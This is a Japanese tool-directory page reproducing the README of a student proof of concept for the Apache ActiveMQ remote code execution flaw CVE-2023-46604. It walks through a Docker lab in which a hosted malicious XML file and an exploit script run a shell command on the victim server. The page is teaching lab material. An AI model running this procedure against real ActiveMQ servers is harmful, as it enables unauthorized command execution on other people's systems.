Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SSP-Assignment-3-RCEYouLater — UPBのAdvanced Cyber Security修士課程向けのSPSクラスの一環として作成されたCVE-2023-46604のPoC。 | Kitploit
ツール/GitHubGitHub/rockydesigne/ssp-assignment-3-rceyoulater
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubrockydesigne/ssp-assignment-3-rceyoulater

SSP-Assignment-3-RCEYouLater

UPBのAdvanced Cyber Security修士課程向けのSPSクラスの一環として作成されたCVE-2023-46604のPoC。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
258ヶ月前未レビュー

CVE-2023-46604: Apache ActiveMQ RCE 概念実証

課題: SSP Assignment 3 チーム: RCE You Later メンバー: Banica Horia Alexandru, Comarlau Vlad-Constantin

このリポジトリを使用してPoCを実行する様子のビデオリンク: https://www.youtube.com/watch?v=vum4qTF4ygU

🚨 概要

このリポジトリには、CVE-2023-46604 に対する完全に機能する概念実証 (PoC) が含まれています。 この脆弱性により、攻撃者は脆弱なApache ActiveMQサーバー(バージョン5.15.10)に悪意のあるXML設定ファイルを逆シリアル化させることで、任意のシェルコマンドを実行できます。

目標: 被害サーバー内に pwned_by_ssp_team というファイルを作成し、制御を証明します。


🛠️ 前提条件

エクスプロイトを実行する前に、以下が整っていることを確認してください:

  1. Docker & Docker Compose(インストール済みで実行中)
  2. Python 3

📂 リポジトリ構成

  • vulnerable-env/: 被害サーバーのDocker設定が含まれています。
  • attacker/: エクスプロイトスクリプトと悪意のあるペイロードが含まれています。
    • exploit.py: 悪意のあるパケットを送信するPythonスクリプト。
    • serve.py: XMLペイロードをホストするシンプルなHTTPサーバー。
    • poc.xml: コマンド touch /tmp/pwned_by_ssp_team を含む悪意のある設定ファイル。

🚀 ステップバイステップの使用方法ガイド

ステップ1: 被害者(ActiveMQ)を起動

Dockerを使って、古くて脆弱なバージョンのActiveMQを実行します。

  1. ターミナルを開きます。
  2. vulnerable-env フォルダに移動します:
    cd vulnerable-env
    
  3. コンテナを起動します:
    docker-compose up -d
    
  4. サーバーが完全に起動するまで30秒待ちます。

ステップ2: 悪意のあるXMLをホスト

被害サーバーは私たちから指示をダウンロードする必要があります。これらの指示をホストするために小さなWebサーバーをセットアップします。

  1. 2つ目のターミナルを開きます。
  2. attacker フォルダに移動します:
    cd attacker
    
  3. Python Webサーバーを起動します:
    python3 serve.py
    
    このターミナルは開いたままにしておいてください!「Serving HTTP on 0.0.0.0 port 8000...」と表示されるはずです。

ステップ3: エクスプロイトを実行

次に、脆弱性を引き起こす特定のネットワークパケットを送信します。

  1. 3つ目のターミナルを開きます。

  2. attacker フォルダに移動します:

    cd attacker
    
  3. エクスプロイトスクリプトを実行します。

    • 注意: macOS または Windows を使用している場合は、以下のコマンドをそのまま使用してください。
    python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
    
    • Linuxユーザー: Linuxを使用している場合、host.docker.internal をネットワークブリッジのゲートウェイ(通常は 172.17.0.1)に置き換えてください。指定されたものが機能しない場合は、次のようにアドレスを取得してみてください:docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'

ステップ4: ハックを確認

成功しましたか?コンテナ内にファイルが作成されたか確認しましょう。

  1. 最初のターミナル(または任意のターミナル)に戻ります。
  2. 被害コンテナ内の /tmp フォルダを確認するために次のコマンドを実行します:
    docker exec activemq-victim ls -l /tmp
    
  3. 成功: pwned_by_ssp_team という名前のファイルが表示されるはずです。

🧹 クリーンアップ

脆弱なコンテナを停止して削除するには:

cd vulnerable-env
docker-compose down
ツールをダウンロード